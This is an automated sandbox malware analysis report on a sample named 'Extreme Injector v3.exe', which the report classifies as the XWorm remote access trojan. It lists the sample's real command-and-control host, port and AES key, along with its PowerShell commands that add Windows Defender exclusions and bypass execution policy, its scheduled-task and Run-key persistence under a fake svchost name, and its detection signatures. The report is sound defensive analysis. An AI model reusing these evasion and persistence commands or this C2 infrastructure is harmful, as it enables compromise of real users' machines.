Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Extreme Injector v3.exe

Overview

General Information

Sample name:Extreme Injector v3.exe
Analysis ID:1582591
MD5:c55baf4bb32f9fe3d218f67ca63ca5b8
SHA1:7c527e04b3e4ebaa8394600221a1fcebe7695be8
SHA256:defb2c3ab19f9abf691eb50b39d3407eb0157d67bcec4c3f73f261e9b5400c96
Tags:exexwormuser-aachum
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Extreme Injector v3.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\Extreme Injector v3.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5544 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7608 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["or-officials.gl.at.ply.gg"], "Port": 43985, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Extreme Injector v3.exeJoeSecurity_XWormYara detected XWormJoe Security
    Extreme Injector v3.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Extreme Injector v3.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0x9fbb:$str01: $VB$Local_Port
      • 0xa006:$str02: $VB$Local_Host
      • 0x8a15:$str03: get_Jpeg
      • 0x8e8d:$str04: get_ServicePack
      • 0xaee6:$str05: Select * from AntivirusProduct
      • 0xb358:$str06: PCRestart
      • 0xb36c:$str07: shutdown.exe /f /r /t 0
      • 0xb41e:$str08: StopReport
      • 0xb3f4:$str09: StopDDos
      • 0xb4ea:$str10: sendPlugin
      • 0xb56a:$str11: OfflineKeylogger Not Enabled
      • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
      • 0xb98b:$str13: Content-length: 5235
      Extreme Injector v3.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xac70:$s6: VirtualBox
      • 0xabce:$s8: Win32_ComputerSystem
      • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xb8a6:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\svchost.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x9fbb:$str01: $VB$Local_Port
          • 0xa006:$str02: $VB$Local_Host
          • 0x8a15:$str03: get_Jpeg
          • 0x8e8d:$str04: get_ServicePack
          • 0xaee6:$str05: Select * from AntivirusProduct
          • 0xb358:$str06: PCRestart
          • 0xb36c:$str07: shutdown.exe /f /r /t 0
          • 0xb41e:$str08: StopReport
          • 0xb3f4:$str09: StopDDos
          • 0xb4ea:$str10: sendPlugin
          • 0xb56a:$str11: OfflineKeylogger Not Enabled
          • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
          • 0xb98b:$str13: Content-length: 5235
          C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xac70:$s6: VirtualBox
          • 0xabce:$s8: Win32_ComputerSystem
          • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xb8a6:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x18520:$s6: VirtualBox
            • 0x1847e:$s8: Win32_ComputerSystem
            • 0x19428:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x194c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x195da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x19156:$cnc4: POST / HTTP/1.1
            00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xaa70:$s6: VirtualBox
                • 0xa9ce:$s8: Win32_ComputerSystem
                • 0xb978:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0xba15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0xbb2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xb6a6:$cnc4: POST / HTTP/1.1
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.Extreme Injector v3.exe.360000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.Extreme Injector v3.exe.360000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.Extreme Injector v3.exe.360000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                    • 0x9fbb:$str01: $VB$Local_Port
                    • 0xa006:$str02: $VB$Local_Host
                    • 0x8a15:$str03: get_Jpeg
                    • 0x8e8d:$str04: get_ServicePack
                    • 0xaee6:$str05: Select * from AntivirusProduct
                    • 0xb358:$str06: PCRestart
                    • 0xb36c:$str07: shutdown.exe /f /r /t 0
                    • 0xb41e:$str08: StopReport
                    • 0xb3f4:$str09: StopDDos
                    • 0xb4ea:$str10: sendPlugin
                    • 0xb56a:$str11: OfflineKeylogger Not Enabled
                    • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
                    • 0xb98b:$str13: Content-length: 5235
                    0.0.Extreme Injector v3.exe.360000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xac70:$s6: VirtualBox
                    • 0xabce:$s8: Win32_ComputerSystem
                    • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xb8a6:$cnc4: POST / HTTP/1.1
                    0.2.Extreme Injector v3.exe.265f8b0.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 6 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
                      Sigma detected: Suspect Svchost Activity
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe
                      Sigma detected: System File Execution Location Anomaly
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 5544, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Schedule system process
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 5544, ProcessName: schtasks.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-31T00:49:24.694825+010028559241Malware Command and Control Activity Detected192.168.2.449823147.185.221.2443985TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: Extreme Injector v3.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: or-officials.gl.at.ply.ggAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Found malware configuration
                      Source: Extreme Injector v3.exeMalware Configuration Extractor: Xworm {"C2 url": ["or-officials.gl.at.ply.gg"], "Port": 43985, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 78%
                      Multi AV Scanner detection for submitted file
                      Source: Extreme Injector v3.exeReversingLabs: Detection: 78%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Extreme Injector v3.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: Extreme Injector v3.exeString decryptor: or-officials.gl.at.ply.gg
                      Source: Extreme Injector v3.exeString decryptor: 43985
                      Source: Extreme Injector v3.exeString decryptor: <123456789>
                      Source: Extreme Injector v3.exeString decryptor: <Xwormmm>
                      Source: Extreme Injector v3.exeString decryptor: XWorm V5.6
                      Source: Extreme Injector v3.exeString decryptor: USB.exe
                      Source: Extreme Injector v3.exeString decryptor: %AppData%
                      Source: Extreme Injector v3.exeString decryptor: svchost.exe
                      Source: Extreme Injector v3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Extreme Injector v3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49823 -> 147.185.221.24:43985
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: or-officials.gl.at.ply.gg
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 147.185.221.24 ports 43985,3,4,5,8,9
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: Extreme Injector v3.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Extreme Injector v3.exe.360000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49823 -> 147.185.221.24:43985
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
                      Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: or-officials.gl.at.ply.gg
                      Source: powershell.exe, 00000004.00000002.1876687071.0000012E7A878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                      Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
                      Source: powershell.exe, 00000001.00000002.1751532684.000001B2B9310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                      Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp, Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: Extreme Injector v3.exe, svchost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000001.00000002.1746315456.000001B2B0E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1854477434.0000012E72044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2014105281.000001C0EC554000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.com/pki/ceooCerAut_2010-06
                      Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.1876479990.0000012E7A812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
